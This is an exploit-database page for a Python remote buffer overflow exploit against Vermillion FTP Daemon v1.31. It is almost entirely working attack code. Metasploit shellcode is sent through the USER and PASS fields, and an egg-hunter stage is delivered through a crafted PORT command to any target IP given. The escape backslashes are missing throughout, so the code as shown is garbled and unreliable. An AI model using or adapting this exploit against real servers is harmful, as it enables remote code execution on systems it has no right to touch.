Vermillion FTP Deamon v1.31 Remote BOF Exploit

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Vermillion FTP Deamon v1.31 Remote BOF Exploit
# Published : 2010-01-30
# Author : Dz_attacker
# Previous Title : UplusFtp Server v1.7.0.12 Remote Buffer Overflow
# Next Title : CamShot v1.2 SEH Overwrite Exploit

# Exploit Title: Vermillion FTP Deamon Remote BOF Exploit
# Date: 29/01/2010
# Author: Dz_attacker
# Software Link: http://www.softsea.com/download/Vermillion-FTP-Daemon.html
# Version: 1.31
# Tested on: Windows xp sp3
# Code :

#!/usr/bin/python

#[+] Original : http://www.global-evolution.info/news/files/vftpd/vftpd.txt

import socket
import sys
import time

if (len(sys.argv) != 2):
print "+++++++++++++++++++++++++++++++++++++++++++++++++"
print "[+] Vftpd Remote BOF Exploit"
print "[+] Exploit By Dz_attacker (dz_attacker@hotmail.fr)"
print "[+] Usage : %s <target_ip>" %sys.argv[0]
print "+++++++++++++++++++++++++++++++++++++++++++++++++n"
sys.exit(0)



# win32_exec - EXITFUNC=process CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com
shellcode=(
"x44x5ax32x37x44x5ax32x37x90x90x90x90x90x90x90x90"
"x2bxc9x83xe9xdexd9xeexd9x74x24xf4x5bx81x73x13xc1"
"xbcxecx76x83xebxfcxe2xf4x3dx54xa8x76xc1xbcx67x33"
"xfdx37x90x73xb9xbdx03xfdx8exa4x67x29xe1xbdx07x3f"
"x4ax88x67x77x2fx8dx2cxefx6dx38x2cx02xc6x7dx26x7b"
"xc0x7ex07x82xfaxe8xc8x72xb4x59x67x29xe5xbdx07x10"
"x4axb0xa7xfdx9exa0xedx9dx4axa0x67x77x2ax35xb0x52"
"xc5x7fxddxb6xa5x37xacx46x44x7cx94x7ax4axfcxe0xfd"
"xb1xa0x41xfdxa9xb4x07x7fx4ax3cx5cx76xc1xbcx67x1e"
"xfdxe3xddx80xa1xeax65x8ex42x7cx97x26xa9xc2x34x94"
"xb2xd4x74x88x4bxb2xbbx89x26xdfx8dx1axa2xbcxecx76")

stage = "92060006,92080001,92120010,92150015,92000015,92040002,"
stage += "92050002,92060010,92000002,92050008,92120013,92020014,"
stage += "92030012,92000005,92050010,92070004,92140015,92110008,"
stage += "92040004,92050010,92030002,92030007,92080011,92150010,"
stage += "92100015,92070005,92140010,92100015,92070005,92140007,"
stage += "92150015,92140007,"

payload = shellcode + "x44"*(500-len(shellcode))

buffer = "92040001,"*11
buffer += stage
buffer += "92020004,"
buffer += "92150011,"
buffer += "92010002,"
buffer += "92000000,"
buffer += "92020013,"
buffer += "92070000,"
buffer += "92040002,"
buffer += "92000000,"
buffer += "2"

s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=s.connect((sys.argv[1],21))
print "[x] Sending Shellcode..."
s.recv(1024)
s.send('USER '+payload+'rn')
s.recv(1024)
s.send('PASS '+payload+'rn')
s.recv(1024)
s.send('SYSTrn')
s.recv(1024)
s.send('QUITrn')
s.recv(1024)
s.close()

time.sleep(2)

s2=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s2.connect((sys.argv[1],21))
print "[x] Sending Exploit..."
s2.send('PORT '+buffer+'rn')
s2.close()
time.sleep(2)
print "[x] Hunting the shellcode..."
time.sleep(3)
raw_input("[x] Done, press enter to quit")